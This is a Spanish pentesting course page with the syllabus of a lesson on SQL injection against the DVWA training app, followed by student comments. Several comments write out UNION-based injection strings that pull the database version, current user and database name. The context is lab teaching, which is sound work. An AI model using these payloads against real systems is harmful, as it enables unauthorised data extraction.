Ataques de inyección de código para obtener información de usuarios y nombre de la base de datos

Curso de Fundamentos de Pentesting

Bienvenida y presentación general

Introducción y pasos para aprender sobre pentesting

¿Qué es Pentesting?

Modelo de trabajo PTES

Instalación y configuración de máquinas virtuales para laboratorios

Conceptos generales de redes

Modelo TCP/IP

Enrutamiento

Configuración de una máquina virtual como enrutador

Clonación de la máquina para tener un segundo enrutador

Tablas de enrutamiento y configuración de rutas

Configuración completa del entorno de red

Etapa I: Recopilación de información

Whois

Netcraft

HTTrack

Recon-NG

Escaneo y análisis de vulnerabilidades

Análisis de protocolos TCP y UDP

Escaneo por barrido de IPs y de puertos

Análisis de TCP con Wireshark

Barrido de IPs con nmap

Escaneo XMAS

Escaneo NULL

NMAP Scripting

Análisis de vulnerabilidades con OpenVAS

Explotación

Análisis de servicios web

Explotación de vulnerabilidades con Metasploit

Arquitectura de Metasploit

Ataques con Armitage

Spidering web

Ataques de inyección de código para obtener información de usuarios y nombre de la base de datos

Ataques de inyección de código para obtener información de los usuarios del sistema

Ataques XSS

Post-Explotación

Creación del archivo malicioso y configuración de Meterpreter

Acceso desde Windows a la máquina de Kali

Estructura de un reporte y cómo aprender más de Pentesting

No tienes acceso a esta clase

¡Continúa aprendiendo! Únete y comienza a potenciar tu carrera

Crear cuenta

Si ya tienes una cuenta,

Iniciar sesión

Recursos

DVWA(Damn Vulnerable Web Application) es una herramienta para aprender y probar diferentes tipos de ataque.

Aportes 14

Preguntas 4

Ordenar por:

Los aportes, preguntas y respuestas son vitales para aprender en comunidad. Regístrate o inicia sesión para participar.

Ariel Jacob

hace 3 años

Comando utilizados en la clase:
Sintaxis (estructura mysql):
SELECT first_name, last_name
FROM users
WHERE user_id = '$id’
Ej: 1 (devuelve user id1)
;

Sintaxis de Inyecciones:
WHERE user_id = ‘%’ or ‘0’=‘0’
UNION SELECT null,version()’
;

Escribir en campo:
%’ or ‘0’=‘0’ UNION SELECT null,version()’ = devuelve usuarios id y la versión del SO
%’ or ‘0’=‘0’ UNION SELECT null,user()’ = devuelve usuarios id y el tipo de usuario (ej. root)
%’ or ‘0’=‘0’ UNION SELECT null,database()’ = devuelve usuarios id y la base de datos

Wilson Gustavo Chango Sailema

hace 2 años

 %’ or '0'='0
------------------
%’ or '0'='0'
UNION SELECT null,version()'
-----------------------------

Memfis

hace 2 años

Deberían entonces añadir a la ruta de seguridad informática algún curso de bases de datos

Jonathan Edwin Gutiérrez Olvera

hace 2 años

les recomiendo volver a dejar el proxy en automatico del navegador

Adán Hernández

hace un año

Consultas:

’ or ‘0’=‘0
’ or ‘0’=‘0’ UNION SELECT null,version()’
’ or ‘0’=‘0’ UNION SELECT null,user()’
’ or ‘0’=‘0’ UNION SELECT null,database()’

No olviden configurar la seguridad a low.

Oscar Jaramillo

hace un año

Oscar Jaramillo

hace un año

Jairo Tinjacá

hace 2 años

Buena clase y entendida claramente!

Carlos Andrés Bello Ramírez

hace 2 años

He trabajado con sql pero cielos ese % me confundio… no entendi ese %

Valentin Francisco Blanco

hace 2 meses

Mas sobre SQL Injection: https://www.w3schools.com/sql/sql_injection.asp

Oscar Jaramillo

hace un año

Pablo Aquino

hace 2 años

Excelente clase, para introducirnos en el SQL Inject.

Ray Miguel Hernández Cabrera

hace un año

Muy buena clase, se me complico un poco con las comillas pero lo logre

Marco

hace 2 años

no me funciona los querys